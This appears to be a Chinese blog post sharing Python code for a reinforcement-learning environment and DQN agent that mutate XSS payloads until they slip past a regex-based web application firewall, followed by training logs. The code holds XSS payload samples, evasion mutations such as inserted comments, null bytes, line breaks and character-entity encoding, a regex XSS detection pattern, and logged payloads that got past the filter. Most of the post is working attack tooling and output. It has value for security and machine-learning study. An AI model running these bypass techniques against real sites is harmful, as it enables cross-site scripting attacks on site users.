WAF 强化学习

参考:https://github.com/duoergun0729/3book/tree/master/code/gym-waf

代码:

wafEnv.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
#-*- coding:utf-8 –*-
import numpy as np
import re
import random
from gym import spaces
import gym
from sklearn.model_selection import train_test_split
 
#samples_file="xss-samples.txt"
samples_file="xss-samples-all.txt"
samples=[]
with open(samples_file) as f:
    for line in f:
        line = line.strip('\n')
        print("Add xss sample:" + line)
        samples.append(line)
 
# 划分训练和测试集合
samples_train, samples_test = train_test_split(samples, test_size=0.4)
 
 
class Xss_Manipulator(object):
    def __init__(self):
        self.dim = 0
        self.name=""
 
    #常见免杀动作:
    # 随机字符转16进制 比如: a转换成a
    # 随机字符转10进制 比如: a转换成a
    # 随机字符转10进制并假如大量0 比如: a转换成a
    # 插入注释 比如: /*abcde*/
    # 插入Tab
    # 插入回车
    # 开头插入空格 比如: /**/
    # 大小写混淆
    # 插入 \00 也会被浏览器忽略
 
    ACTION_TABLE = {
    #'charTo16': 'charTo16',
    #'charTo10': 'charTo10',
    #'charTo10Zero': 'charTo10Zero',
    'addComment': 'addComment',
    'addTab': 'addTab',
    'addZero': 'addZero',
    'addEnter': 'addEnter',
    }
 
    def charTo16(self,str,seed=None):
        #print("charTo16")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #print("search --> matchObj.group() : ", matchObjs)
            modify_char=random.choice(matchObjs)
            #字符转ascii值ord(modify_char
            #modify_char_10=ord(modify_char)
            modify_char_16="&#{};".format(hex(ord(modify_char)))
            #print("modify_char %s to %s" % (modify_char,modify_char_10))
            #替换
            str=re.sub(modify_char, modify_char_16, str,count=random.randint(1,3))
 
 
 
 
        return str
 
    def charTo10(self,str,seed=None):
        #print("charTo10")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #print("search --> matchObj.group() : ", matchObjs)
            modify_char=random.choice(matchObjs)
            #字符转ascii值ord(modify_char
            #modify_char_10=ord(modify_char)
            modify_char_10="&#{};".format(ord(modify_char))
            #print("modify_char %s to %s" % (modify_char,modify_char_10))
            #替换
            str=re.sub(modify_char, modify_char_10, str)
 
        return str
 
    def charTo10Zero(self,str,seed=None):
        #print("charTo10")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #print("search --> matchObj.group() : ", matchObjs)
            modify_char=random.choice(matchObjs)
            #字符转ascii值ord(modify_char
            #modify_char_10=ord(modify_char)
            modify_char_10="&#000000{};".format(ord(modify_char))
            #print("modify_char %s to %s" % (modify_char,modify_char_10))
            #替换
            str=re.sub(modify_char, modify_char_10, str)
 
        return str
 
    def addComment(self,str,seed=None):
        #print("charTo10")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #选择替换的字符
            modify_char=random.choice(matchObjs)
            #生成替换的内容
            #modify_char_comment="{}/*a{}*/".format(modify_char,modify_char)
            modify_char_comment = "{}/*8888*/".format(modify_char)
 
            #替换
            str=re.sub(modify_char, modify_char_comment, str)
 
        return str
 
    def addTab(self,str,seed=None):
        #print("charTo10")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #选择替换的字符
            modify_char=random.choice(matchObjs)
            #生成替换的内容
            modify_char_tab="   {}".format(modify_char)
 
            #替换
            str=re.sub(modify_char, modify_char_tab, str)
 
        return str
 
    def addZero(self,str,seed=None):
        #print("charTo10")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #选择替换的字符
            modify_char=random.choice(matchObjs)
            #生成替换的内容
            modify_char_zero="\\00{}".format(modify_char)
 
            #替换
            str=re.sub(modify_char, modify_char_zero, str)
 
        return str
 
 
    def addEnter(self,str,seed=None):
        #print("charTo10")
        matchObjs = re.findall(r'[a-qA-Q]', str, re.M | re.I)
        if matchObjs:
            #选择替换的字符
            modify_char=random.choice(matchObjs)
            #生成替换的内容
            modify_char_enter="\\r\\n{}".format(modify_char)
 
            #替换
            str=re.sub(modify_char, modify_char_enter, str)
 
        return str
 
    def modify(self,str, _action, seed=6):
 
        print("Do action :%s" % _action)
        action_func=Xss_Manipulator().__getattribute__(_action)
 
        return action_func(str,seed)
 
ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}
 
 
 
#<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
#a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
#"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
#<input onblur=write(XSS) autofocus><input autofocus>
#<math><a xlink:href="//jsfiddle.net/t846h/">click
#<h1><font color=blue>hellox worldss</h1>
#LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
 
 
class Waf_Check(object):
    def __init__(self):
        self.name="Waf_Check"
        self.regXSS=r'(prompt|alert|confirm|expression])' \
                    r'|(javascript|script|eval)' \
                    r'|(onload|onerror|onfocus|onclick|ontoggle|onmousemove|ondrag)' \
                    r'|(String.fromCharCode)' \
                    r'|(;base64,)' \
                    r'|(onblur=write)' \
                    r'|(xlink:href)' \
                    r'|(color=)'
        #self.regXSS = r'javascript'
 
 
 
    def check_xss(self,str):
        isxss=False
 
        #忽略大小写
        if re.search(self.regXSS,str,re.IGNORECASE):
            isxss=True
 
        return isxss
 
class Features(object):
    def __init__(self):
        self.dim = 0
        self.name=""
        self.dtype=np.float32
 
    def byte_histogram(self,str):
        #bytes=np.array(list(str))
        bytes=[ord(ch) for ch in list(str)]
        #print(bytes)
 
        h = np.bincount(bytes, minlength=256)
        return np.concatenate([
            [h.sum()],  # total size of the byte stream
            h.astype(self.dtype).flatten() / h.sum(),  # normalized the histogram
        ])
 
    def extract(self,str):
 
        featurevectors = [
            [self.byte_histogram(str)]
        ]
        return np.concatenate(featurevectors)
 
 
class WafEnv_v0(gym.Env):
    metadata = {
        'render.modes': ['human', 'rgb_array'],
    }
 
    def __init__(self):
        self.action_space = spaces.Discrete(len(ACTION_LOOKUP))
 
        #xss样本特征集合
        #self.samples=[]
        #当前处理的样本
        self.current_sample=""
        #self.current_state=0
        self.features_extra=Features()
        self.waf_checker=Waf_Check()
        #根据动作修改当前样本免杀
        self.xss_manipulatorer= Xss_Manipulator()
 
        self._reset()
 
 
    def _seed(self, num):
        pass
 
    def _step(self, action):
 
        r=0
        is_gameover=False
        #print("current sample:%s" % self.current_sample)
 
        _action=ACTION_LOOKUP[action]
        #print("action is %s" % _action)
 
        self.current_sample=self.xss_manipulatorer.modify(self.current_sample,_action)
        #print("change current sample to %s" % self.current_sample)
 
        if not self.waf_checker.check_xss(self.current_sample):
            #给奖励
            r=10
            is_gameover=True
            print("Good!!!!!!!avoid waf:%s" % self.current_sample)
 
        self.observation_space=self.features_extra.extract(self.current_sample)
 
        return self.observation_space, r,is_gameover,{}
 
 
    def _reset(self):
        self.current_sample=random.choice(samples_train)
        print("reset current_sample=" + self.current_sample)
 
        self.observation_space=self.features_extra.extract(self.current_sample)
        return self.observation_space
 
 
    def render(self, mode='human', close=False):
        return

 主代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
#-*- coding:utf-8 –*-
import gym
import time
import random
import gym_waf.envs.wafEnv
import pickle
import numpy as np
 
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, ELU, Dropout, BatchNormalization
from keras.optimizers import Adam, SGD, RMSprop
 
 
from rl.agents.dqn import DQNAgent
from rl.agents.sarsa import SarsaAgent
from rl.policy import EpsGreedyQPolicy
from rl.memory import SequentialMemory
 
 
from gym_waf.envs.wafEnv  import samples_test,samples_train
# from gym_waf.envs.features import Features
from gym_waf.envs.waf import Waf_Check
from gym_waf.envs.xss_manipulator import Xss_Manipulator
 
from keras.callbacks import TensorBoard
 
ENV_NAME = 'Waf-v0'
#尝试的最大次数
nb_max_episode_steps_train=50
nb_max_episode_steps_test=3
 
ACTION_LOOKUP = {i: act for i, act in enumerate(Xss_Manipulator.ACTION_TABLE.keys())}
 
class Features(object):
    def __init__(self):
        self.dim = 0
        self.name=""
        self.dtype=np.float32
 
    def byte_histogram(self,str):
        #bytes=np.array(list(str))
        bytes=[ord(ch) for ch in list(str)]
        #print(bytes)
 
        h = np.bincount(bytes, minlength=256)
        return np.concatenate([
            [h.sum()],  # total size of the byte stream
            h.astype(self.dtype).flatten() / h.sum(),  # normalized the histogram
        ])
 
    def extract(self,str):
 
        featurevectors = [
            [self.byte_histogram(str)]
        ]
        return np.concatenate(featurevectors)
 
 
def generate_dense_model(input_shape, layers, nb_actions):
    model = Sequential()
    model.add(Flatten(input_shape=input_shape))
    model.add(Dropout(0.1))
 
    for layer in layers:
        model.add(Dense(layer))
        model.add(BatchNormalization())
        model.add(ELU(alpha=1.0))
 
    model.add(Dense(nb_actions))
    model.add(Activation('linear'))
    print(model.summary())
 
    return model
 
 
def train_dqn_model(layers, rounds=10000):
 
    env = gym.make(ENV_NAME)
    env.seed(1)
    nb_actions = env.action_space.n
    window_length = 1
 
    print("nb_actions:")
    print(nb_actions)
    print("env.observation_space.shape:")
    print(env.observation_space.shape)
 
 
    model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions)
 
    policy = EpsGreedyQPolicy()
 
    memory = SequentialMemory(limit=256, ignore_episode_boundaries=False, window_length=window_length)
 
    agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16,
                     enable_double_dqn=True, enable_dueling_network=True, dueling_type='avg',
                     target_model_update=1e-2, policy=policy, batch_size=16)
 
    agent.compile(RMSprop(lr=1e-3), metrics=['mae'])
 
    #tb_cb = TensorBoard(log_dir='/tmp/log', write_images=1, histogram_freq=1)
    #cbks = [tb_cb]
    # play the game. learn something!
    #nb_max_episode_steps 一次学习周期中最大步数
    agent.fit(env, nb_steps=rounds, nb_max_episode_steps=nb_max_episode_steps_train,visualize=False, verbose=2)
 
    #print("#################Start Test%################")
 
    #agent.test(env, nb_episodes=100)
 
    test_samples=samples_test
 
    features_extra = Features()
    waf_checker = Waf_Check()
    # 根据动作修改当前样本免杀
    xss_manipulatorer = Xss_Manipulator()
 
    success=0
    sum=0
 
    shp = (1,) + tuple(model.input_shape[1:])
 
    for sample in samples_test:
        #print(sample)
        sum+=1
 
        for _ in range(nb_max_episode_steps_test):
 
            if not waf_checker.check_xss(sample) :
                success+=1
                print(sample)
                break
 
            f = features_extra.extract(sample).reshape(shp)
            act_values = model.predict(f)
            action=np.argmax(act_values[0])
            sample=xss_manipulatorer.modify(sample,ACTION_LOOKUP[action])
 
    print("Sum:{} Success:{}".format(sum,success))
 
    return agent, model
 
 
if __name__ == '__main__':
    agent1, model1= train_dqn_model([5, 2], rounds=1000)
    model1.save('waf-v0.h5', overwrite=True)

 效果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
reset current_sample=<img src=`xx:xx`onerror=alert(1)>
Do action :addEnter
Do action :addComment
Good!!!!!!!avoid waf:<img src=`xx:xx`
one/*8888*/rr
or=ale/*8888*/rt(1)>
 987/1000: episode: 221, duration: 0.016s, episode steps: 2, steps per second: 122, episode reward: 10.000, mean reward: 5.000 [0.000, 10.000], mean action: 1.500 [0.000, 3.000], mean observation: 0.179 [0.000, 53.000], loss: 1.608465, mean_absolute_error: 3.369818, mean_q: 7.756353
reset current_sample=<!--<img src="--><img src=x onerror=alert(123)//">
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addZero
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addEnter
Do action :addEnter
Good!!!!!!!avoid waf:<!--<

 

posted @   bonelee  阅读(954)  评论(0编辑  收藏  举报
编辑推荐:
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
点击右上角即可分享
微信分享提示